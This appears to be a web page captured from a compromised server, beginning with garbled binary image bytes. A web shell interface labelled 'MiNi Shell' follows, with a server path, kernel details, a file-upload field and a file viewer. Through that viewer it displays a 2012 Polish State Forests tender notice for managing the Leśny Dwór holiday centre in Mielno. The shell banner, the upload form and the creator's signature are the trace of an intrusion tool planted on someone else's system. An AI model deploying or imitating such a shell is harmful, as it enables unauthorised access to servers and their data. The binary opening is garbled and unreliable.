JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121023/412278-N-2012.html

<p class="kh_header"><b>Łódź: Administrowanie Ośrodkiem Wypoczynkowym <Leśny Dwór>  w Mielnie, ul. Orła Białego nr 8, w latach 2013 - 2014 - Zn.spr.: ER1-2710-7/12</b><br>
<b>Numer ogłoszenia: 412278 - 2012; data zamieszczenia: 23.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalna Dyrekcja Lasów Państwowych w Łodzi , ul. Matejki 16, 91-402 Łódź, woj. łódzkie, tel. 42 6317955, faks 42 6317982.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lodz.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Administrowanie Ośrodkiem Wypoczynkowym <Leśny Dwór>  w Mielnie, ul. Orła Białego nr 8, w latach 2013 - 2014 - Zn.spr.: ER1-2710-7/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa administrowania w imieniu Regionalnej Dyrekcji  Lasów Państwowych w Łodzi Ośrodkiem Wypoczynkowym Leśny Dwór w Mielnie, zwanym dalej Ośrodkiem, w tym m. innymi: 
1)	 obsługa ruchu klientów, ochrona obiektu i wyposażenia, utrzymanie ładu i porządku w Ośrodku i na terenie posesji oraz innych czynności zapewniających prawidłowe funkcjonowanie Ośrodka, 
2)	 zabezpieczenia ośrodka wypoczynkowego przed włamaniem, kradzieżą, pożarami i innymi ryzykami,
3)	 utrzymywania czystości i porządku we wszystkich pokojach, korytarzach, pomieszczeniach gospodarczych oraz na całym terenie posesji i  wokół posesji  
4)	 wykonywania innych niezbędnych prac związanych z utrzymywaniem ładu i porządku wewnątrz i na zewnątrz ośrodka
5)	 przyjmowania do Ośrodka Wypoczynkowego wczasowiczów skierowanych przez Zleceniodawcę i zapewnienia im należytych warunków do wypoczynku.
6)	 prowadzenia na bieżąco książki meldunkowej,  pobierania od osób korzystających z ośrodka ustalonych opłat na rzecz Gminy Mielno, ich odprowadzania oraz szczegółowego dokumentowania tych czynności
7)	 w zakresie działalności ośrodka, pozostawania w dyspozycyjności na rzecz osób korzystających z ośrodka 
8)	 zachowanie zarządu Regionalnej Dyrekcji Lasów Państwowych w Łodzi nad składnikami majątkowymi - nieruchomościami i mieniem  ruchomym oraz wszelkimi prawami przysługującymi Regionalnej Dyrekcji Lasów Państwowych w Łodzi na mocy odrębnych przepisów i umów,
9)	 identyfikacja, analiza oraz minimalizacja ryzyk technicznych (w szczególności: gaz, woda, ścieki, ogień)  związanych z funkcjonowa-niem Ośrodka,
2.	Zamawiający oświadcza, że jest zarządcą pozostającej w zasobach Lasów  Państwowych nieruchomości Skarbu Państwa położonej w 76-032 Mielno, ul. Orła Białego 8, na której znajduje się Ośrodek Wypoczynkowy Leśny Dwór w Mielnie i na podstawie art. 34 pkt 1 ustawy z dnia 28.09.1991 r. o lasach reprezentuje Skarb Państwa jako właściciela nieruchomości.
3.	Przedmiotowa nieruchomość nie jest obciążona prawami osób trzecich, długami ani ograniczeniami w rozporządzaniu.
4.	Ośrodek wypoczynkowy dysponuje 62 miejscami noclegowymi w 22  pokojach 2 i 3 osobowych. Pokoje o wysokim standardzie, po przeprowadzonej modernizacji w 2003 r., z pełnym węzłem sanitarnym. Każdy pokój posiada mini euro kuchnię wyposażoną w kuchnię elektryczną, lodówkę i wyposażenie kuchenne. Ponadto, na przełomie 2012/13 zamawiający planuje dokonać modernizacji Ośrodka, polegającej na remoncie elewacji i ogrodzenia, przebudowie wejścia głównego, montażu placu zabaw oraz budową obiektów małej architektury (wiaty grillowe, ławki, wędzarnia stacjonarna)
5.	Przedmiot zamówienia we Wspólnym Słowniku Zamówień (CPV) oznaczony jest kodem:
-	55240000-4 Usługi w zakresie ośrodków i domów wypoczynkowych
-	55241000-1 Usługi w zakresie ośrodków wypoczynkowych
-	55242000-8 Usługi w zakresie domów wypoczynkowych
-	55243000-5 Usługi w zakresie obozowisk dla dzieci
-	55250000-7 Usługi w zakresie krótkoterminowego wynajmu umeblowa- nych miejsc noclegowych

6.	Regionalna Dyrekcja Lasów Państwowych w Łodzi nie będzie stawiać przeszkód wykonawcy w przypadku, gdy będzie on zamierzał uruchomić w obrębie Ośrodka działalność na własny rachunek, o ile działalność ta nie będzie zakłócała wiodącego profilu działalności Ośrodka i będzie jego promocją. 
7.	W terminie 10 dni po podpisaniu umowy (udzieleniu zamówienia) wykonawca przedłoży zamawiającemu do akceptacji całościową Koncepcję Funkcjonowania i Rozwoju Ośrodka Wypoczynkowego <Leśny Dwór>, zwaną dalej Koncepcją, która będzie załącznikiem nr 1 do umowy. Koncepcja powinna zawierać w szczególności:
-	    określenie podstawowych i dodatkowych form działalności Ośrodka Wypoczynkowego, w tym działalności o której mowa w punkcie 6;
-	    wizję rozwoju sprzedaży usług na okres nie krótszy niż 2 lata (z uwzględnieniem sprzedaży internetowej usług oraz współpracy z jednostkami organizacyjnymi Regionalnej Dyrekcji Lasów Państwowych w Łodzi);
-	    wskazanie dodatkowych innowacyjnych kierunków działalności Ośrodka Wypoczynkowego;
-	    plan rozwoju usług (produktów) turystycznych,
-	    utrzymanie wiodącego profilu działalności Ośrodka Leśny Dwór w niezmienionym zakresie jako pozycji wyjściowej do rozszerzenia zakresu działalności na inne obszary,
-	    program ograniczania kosztów stałych,
-	    program działań związanych z promocją Ośrodka, w tym z jego reklamą,
-	    projekt (propozycja) zagospodarowania terenu wokół posesji, w tym mała architektura, zieleń niska i wysoka, etc.

8.	Zamawiający w ciągu 7 dni kalendarzowych od momentu złożenia Koncepcji, o której mowa w punkcie 7, przekazuje Wykonawcy pisemną akceptację złożonej Koncepcji lub też uwagi dotyczące jej treści. W przypadku przekazania uwag Wykonawca w ciągu 5 dni zobowiązany jest nanieść poprawki zgodnie z podniesionymi uwagami i ponownie przekazać Koncepcję do Zamawiającego. 
9.	W przypadku jeśli Zmawiający w czasie ponownej weryfikacji Koncepcji (po naniesieniu poprawek przez Wykonawcę) uzna, że dokumentacja, o której mowa w punkcie 7, nadal nie zawiera wszystkich niezbędnych informacji lub zawiera błędy może ponownie przekazać Wykonawcy uwagi, wówczas obowiązuje Wykonawcę procedura opisana w punkcie 8, lub odmówić przyjęcia Koncepcji. Nie przyjęcie Koncepcji jest podstawą do odstąpienia od Umowy z przyczyn leżących po stronie Wykonawcy w terminie 7 dni od daty przekazania koncepcji.
10.	Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 punkt 6 ustawy Pzp, o wartości do 50 % wartości zamówienia podstawowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>10.	Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 punkt 6 ustawy Pzp, o wartości do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 55.24.10.00-1, 55.24.20.00-8, 55.24.30.00-5, 55.25.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w kwocie 2500,00 zł.

2.	Wadium może być wniesione w jednej lub kilku następujących formach:

a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że  poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9  listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.).	
  
3.	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy zamawiającego 46 1540 1245 2056 4800 1502 0006 z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy. Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty. 

4.	Nie dopuszcza się wnoszenia wadium w formie pieniężnej do kasy Zamawiającego.

5.	Wadium wnoszone w formie: poręczenia bankowego lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w kasie zamawiającego, natomiast jego kopię poświadczoną za zgodność z oryginałem, należy załączyć do oferty.

6. 	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (umocowanego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.

7. 	Wadium w każdej dopuszczalnej formie musi być wniesione najpóźniej do wyznaczonego terminu składania ofert. tj. do dnia 6.11.2012 r. do godz. 10:00.
8. 	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym zamawiającego.

9. 	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.

10. Zamawiający zwraca wadium niezwłocznie:
a)	wszystkim wykonawcom po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a;
b)	wykonawcy, którego oferta została wybrana jako najkorzystniejsza, po zawarciu umowy w sprawie zamówienia publicznego;
c)	na wniosek wykonawcy, którego wycofał ofertę przed upływem terminu składania ofert.

11.	Wadium wniesione w pieniądzu, zamawiający przechowa na rachunku bankowym i zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

12. Wadium wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz z odsetkami w przypadku, gdy wykonawca:
a)	odmówi podpisania umowy na warunkach określonych w ofercie, 
b)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.

13.	Zamawiający zatrzyma wadium także w okolicznościach ujętych w art. 46 ust. 4a Ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać sie wykonawcy, którzy spełniają warunki ujęte w art. 22 ust.1 ustawy Pzp dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności związanych z przedmiotem zamówienia, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 
Dla prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, nie jest ustawowo wymagane posiadanie przez wykonawcę szczególnych uprawnień  typu  koncesja,  zezwolenia lub licencja. W związku z j.w. zamawiający nie precyzuje w tym zakresie żadnych wymagań, które wykonawcy będą zobowiązani spełnić.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać sie wykonawcy, którzy spełniają warunki ujęte w art. 22 ust.1 ustawy Pzp - zgodnie z art. 26 ust 2a ustawy Pzp, zamawiający nie precyzuje warunku w zakresie wiedzy i doświadczenia, który wykonawcy powinni spełniać</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać sie wykonawcy, którzy spełniają warunki ujęte w art. 22 ust.1 ustawy Pzp dotyczące dysponowania odpowiednim potencjałem technicznym  do wykonania zamówienia;  
	Warunek w zakresie potencjału technicznego zostanie spełniony, jeżeli wykonawca wykaże się dysponowaniem minimum jednym sprawnym samochodem - może to być samochód osobowy lub dostawczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać sie wykonawcy, którzy spełniają warunki ujęte w art. 22 ust.1 ustawy Pzp dotyczące dysponowania osobami zdolnymi  do wykonania zamówienia;b)	Warunek w zakresie dysponowania osobami zdolnymi do wykonania zamówienia zostanie spełniony, jeżeli wykonawca wykaże się dysponowaniem co najmniej 1 (jedną) osobą z wykształceniem wyższym (minimum licencjat) - kierunki preferowane aczkolwiek nie rozstrzygające to : administracja, ekonomia, prawo, zarządzenie i marketing, turystyka i rekreacja, posiadającą aktywne prawo jazdy minimum kat. B. Ponadto osoba ta powinna mieć minimum 3-letnie doświadczenie w zakresie zarządzania ośrodkiem wypoczynkowym, turystyczno-rekreacyjnym, hotelarskim lub pokrewnym, zarządzaniu firmą o profilu handlowym lub handlowo - usługowym, w tym administrowaniem jej obiektami budowlanymi, w których ta działalność była prowadzona. Zamawiający uzna także za warunek spełniony, gdy w/w wymagania będzie spełniać nie jedna osoba lecz kilka osób łącznie, którymi wykonawca będzie dysponował.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać sie wykonawcy, którzy spełniają warunki ujęte w art. 22 ust.1 ustawy Pzp dotyczące Sytuacji ekonomicznej  i finansowej.  
   
	Warunek w zakresie sytuacji ekonomicznej zostanie spełniony, jeżeli wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 100 000 złotych.

Zgodnie z art. 26 ust. 2a ustawy Pzp, zamawiający nie precyzuje warunku w zakresie sytuacji finansowej, który wykonawcy powinni spełniać.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej Umowy w stosunku do treści oferty Zleceniobiorcy jest możliwa w następujących przypadkach:

-	konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy,
-	zmiany są korzystne dla Zleceniodawcy,
-	Przekształcenia Zleceniobiorcy - zmiana nazwy firmy,
-	Zmiana przepisów o podatku od towarów i usług (VAT), zmniejszenie/ zwiększenie wynagrodzenia brutto Zleceniobiorcy,
-	Wystąpienie zdarzeń losowych - klęska żywiołowa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_lodz/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> RDLP w Łodzi
ul. J.Matejki 16
91-402 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2012 godzina 10:00, miejsce: Sekretariat (pokój nr 100) RDLP w Łodzi 
ul. J.Matejki 16
91-402 Łódź.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com